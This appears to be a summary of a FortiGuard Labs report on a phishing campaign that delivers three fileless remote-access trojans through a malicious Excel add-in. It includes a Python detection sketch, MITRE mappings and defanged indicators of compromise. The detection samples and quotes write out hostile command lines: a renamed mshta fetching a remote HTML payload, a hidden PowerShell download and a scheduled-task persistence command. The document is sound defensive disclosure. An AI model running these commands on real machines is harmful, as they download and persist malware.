Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I | FortiGuard Labs 

Fortinet FortiGuard Labs uncovered a phishing campaign that delivers three fileless malware families on Windows via a malicious Excel Add-In with VBA macros, leveraging WMI, HTML/JavaScript, and PowerShell to load and execute payloads. The operation uses persistence techniques and process hollowing to deploy AveMariaRAT, BitRAT, and PandoraHVNC, with multiple remote HTML/JS components and scheduled tasks involved.

Key points

  • The campaign disguises itself as a payment report email with an attached Excel Add-In (*.xlam) containing malicious macros.
  • The Excel macro uses an Auto_Open() VBA entry point to decode and execute commands via Windows Management Instrumentation (WMI).
  • It copies and renames mshta.exe to a nonstandard location (ddond.com) to download and execute a remote HTML/JS payload (APRL27.htm).
  • The HTML/JavaScript payload uses WScript.Shell to run PowerShell, download mainpw.dll, and schedule tasks for persistence.
  • The downloaded PowerShell code loads an inner .NET module dynamically and uses it to perform process hollowing against aspnet_compiler.exe.
  • The final three fileless malware samples (AveMariaRAT, BitRAT, PandoraHVNC) are deployed and executed in target processes through a dynamic, multi-stage chain.
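The chain summarised in the key points above leaves a recognisable trail in process-creation telemetry: a renamed mshta.exe launching a remote .htm, a minute-interval schtasks creation, PowerShell fetching a ".dll" that is really a script, and aspnet_compiler.exe appearing under PowerShell. The following Python is an added detection sketch written for this summary; it is not code from the FortiGuard report or from Fortinet. It runs over constructed Sysmon-style process events (field names Image, ParentImage, CommandLine, OriginalFileName), the placeholder host files.example, and a partial allowlist of Windows' own .com utilities, all of which are assumptions. The observation that a command started through WMI's Win32_Process.Create shows WmiPrvSE.exe rather than Excel as its parent is general Windows behaviour, not a detail taken from the page.

```python
"""Detection sketch for the mshta / schtasks / PowerShell / process-hollowing chain.

Added example, not part of the FortiGuard report. Events and URLs are constructed.
"""
import re

# SHA-256 indicators quoted from the report's IoC section.
KNOWN_BAD_SHA256 = {
    "8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC": "Remittance-Details-951244-1.xlam",
    "D71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA": "APRL27.htm",
    "3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449": "mainpw.dll",
}

# Assumption: partial allowlist of .com utilities that ship with Windows; extend for your estate.
WINDOWS_COM_UTILITIES = {"chcp.com", "more.com", "tree.com", "format.com", "mode.com"}


def match_file_hash(sha256):
    """Return the IoC label for a known-bad SHA-256 (case-insensitive), else None."""
    return KNOWN_BAD_SHA256.get(sha256.upper())


def _base(path):
    """Lower-cased file name component of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(ev):
    """Return a list of (rule, detail) tuples for one process-creation event."""
    hits = []
    image = _base(ev.get("Image", ""))
    parent = _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    cmd_l = cmd.lower()
    orig = ev.get("OriginalFileName", "").lower()

    # Report: mshta.exe copied and renamed to ddond.com. OriginalFileName (PE version
    # resource) survives the rename, so compare it with the on-disk name.
    if orig == "mshta.exe" and image != "mshta.exe":
        hits.append(("renamed_mshta", f"{image} has OriginalFileName mshta.exe"))
    # Report: the (renamed) mshta downloads and runs a remote HTML/JS file (APRL27.htm).
    if orig == "mshta.exe" or image == "mshta.exe":
        if re.search(r"https?://\S+\.htm", cmd_l):
            hits.append(("mshta_remote_htm", cmd))
    # Report: schtasks /create /sc MINUTE /mo 82 /tn calendersw ...
    if image == "schtasks.exe" and "/create" in cmd_l and re.search(r"/sc\s+minute", cmd_l):
        m = re.search(r"/tn\s+(\S+)", cmd_l)
        hits.append(("schtasks_minute", f"task {m.group(1) if m else '?'}"))
    # Report: PowerShell downloads mainpw.dll, which is a PowerShell script despite its name.
    if image in ("powershell.exe", "pwsh.exe") and re.search(r"https?://\S+\.dll", cmd_l):
        hits.append(("powershell_dll_download", cmd))
    # Report: the inner .NET module hollows a new aspnet_compiler.exe process.
    if image == "aspnet_compiler.exe" and parent in ("powershell.exe", "pwsh.exe"):
        hits.append(("aspnet_compiler_from_powershell", f"parent {parent}"))
    # General WMI behaviour (not from the page): a Win32_Process.Create child runs under
    # WmiPrvSE.exe, so the macro's command never shows excel.exe as its parent.
    if parent == "wmiprvse.exe" and image.endswith(".com") and image not in WINDOWS_COM_UTILITIES:
        hits.append(("wmi_spawned_dotcom", image))
    return hits


def scan(events):
    """Run every rule over a sequence of events; return (event_index, rule, detail) tuples."""
    findings = []
    for idx, ev in enumerate(events):
        for rule, detail in check_event(ev):
            findings.append((idx, rule, detail))
    return findings


# Constructed sample events modelled on the chain in the report (files.example is a placeholder).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\AppData\Roaming\ddond.com", "OriginalFileName": "MSHTA.EXE",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r'"C:\Users\u\AppData\Roaming\ddond.com" https://files.example/APRL27.htm'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr "C:\\Users\\u\\AppData\\Roaming\\ddond.com C:\\Users\\u\\AppData\\Roaming\\back.htm"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\u\AppData\Roaming\ddond.com",
     "CommandLine": 'powershell.exe -w hidden -c "iwr https://files.example/mainpw.dll"'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "aspnet_compiler.exe"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"EXCEL.EXE" "C:\Users\u\Downloads\report.xlsx"'},  # benign control
]

if __name__ == "__main__":
    for idx, rule, detail in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

Each rule keys on a fixed trait of the chain (OriginalFileName of a renamed binary, the scheduled-task trigger, parent/child pairs) rather than on the file names the report happens to list, so a rerun of the campaign with different names would still trip most of them; the SHA-256 table is kept separately for matching file-write telemetry against the published IoCs.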

MITRE Techniques

  • [T1566.002] Spearphishing Attachment – The phishing email tricks the recipient into opening the attached Excel document for the report detail. “This phishing email attempts to trick the recipient into opening the attached Excel document for the report detail.”
  • [T1059.005] Visual Basic – The Excel Add-In contains an auto-start macro that uses VBA to execute code. “It contains an auto-start Macro that starts using a VBA (Visual Basic Application) method called ‘Auto_Open()’ when the Excel file is opened.”
  • [T1047] Windows Management Instrumentation – The macro decodes a command string and executes it using a WMI object. “decodes a command string and executes it using a WMI (Windows Management Instrumentation) object.”
  • [T1218.005] Mshta – The macro copies mshta.exe under a new name, then uses the copy to download and execute a malicious HTML file. “renames it as ‘ddond.com’. ‘mshta.exe’ is a Windows-native binary file designed to execute Microsoft HTML Application (HTA) files.”
  • [T1059.001] PowerShell – The HTML/JS chain downloads a PowerShell file (mainpw.dll) and executes it. “PowerShell application to download a PowerShell file called ‘mainpw.dll’ and then execute it.”
  • [T1053.005] Scheduled Task – A scheduled task named “calendersw” is created to run payloads at regular intervals. “schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr …”
  • [T1055.012] Process Hollowing – The inner .NET module uses process hollowing to inject payloads into a new aspnet_compiler.exe process. “performs process hollowing to inject the malware payload into a newly-created process of ‘aspnet_compiler.exe’.”
  • [T1620] Reflective Code Loading – The inner .NET module is dynamically loaded and executed via reflection, enabling payload deployment. “The inner .Net module that is dynamically extracted … ‘projFUD.PA.Execute()’ …”
  • [T1027] Obfuscated/Compressed Files and Information – The code uses dynamic strings and decompression to transform payloads. “The first ‘$hexString’ contains a dynamic method for performing GZip decompression.”
  • [T1105] Ingress Tool Transfer – The campaign downloads multiple remote components (APRL27.htm, mainpw.dll, back.htm, etc.) as part of the infection chain. “downloads a PowerShell file called ‘mainpw.dll’ and then execute it.”

Indicators of Compromise

  • [URL] hxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file
  • [URL] hxxps://www[.]mediafire[.]com/file/c3zcoq7ay6nql9i/back[.]htm/file
  • [URL] hxxps://www[.]mediafire[.]com/file/jjyy2npmnhx6o49/Start[.]htm/file
  • [URL] hxxps://taxmogalupupitpamobitola[.]blogspot[.]com/atom[.]xml
  • [SHA-256] Remittance-Details-951244-1.xlam – 8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC
  • [SHA-256] APRL27.htm – D71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA
  • [SHA-256] mainpw.dll – 3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449
  • [File name] Remittance-Details-951244.xlam, APRL27.htm, mainpw.dll

Read more: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware